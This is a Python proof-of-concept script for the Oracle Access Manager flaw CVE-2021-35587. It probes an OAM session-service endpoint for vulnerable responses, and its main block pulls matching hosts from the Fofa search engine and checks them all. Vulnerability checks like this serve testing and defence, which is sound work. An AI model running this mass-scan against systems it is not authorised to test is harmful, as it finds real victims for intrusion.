CVE-2021-35587.py

from pocx import BasicPoc
from pocx.funcs import Fofa
from loguru import logger


class CVE_2021_35587(BasicPoc):
    def __init__(self):
        self.name = "CVE-2021-35587"
        super(CVE_2021_35587, self).__init__()

    def poc(self, target: str):
        poc_url = '/oam/server/opensso/sessionservice'
        url = target + poc_url
        try:
            resp = self.get(url)
            if resp.status_code == 200:
                if 'X-ORACLE-DMS-ECID' in resp.headers or 'X-ORACLE-DMS-RID' in resp.headers:
                    if '/oam/pages/css/general.css' in resp.text and 'login-footer-version' in resp.text and 'Oracle Corporation' in resp.text:
                        logger.success(f"{target} is vulnerable")
                        logger.success(resp.text)
                        return True
            return False
        except Exception as e:
            logger.error(e)
            logger.error(f'[-] {target} is not vulnerable')
            return False

if __name__ == '__main__':
    grammar = 'body="/oam/pages/css/login_page.css"'
    cve = CVE_2021_35587()
    fofa = Fofa()
    fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')
    logger.warning(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')
    pages = fofa.asset_pages(grammar)
    logger.debug(pages)
    for page in range(1, pages + 1):
        logger.debug(f'[*] page {page}')
        assets = fofa.assets(grammar, page)
        cve.run(assets)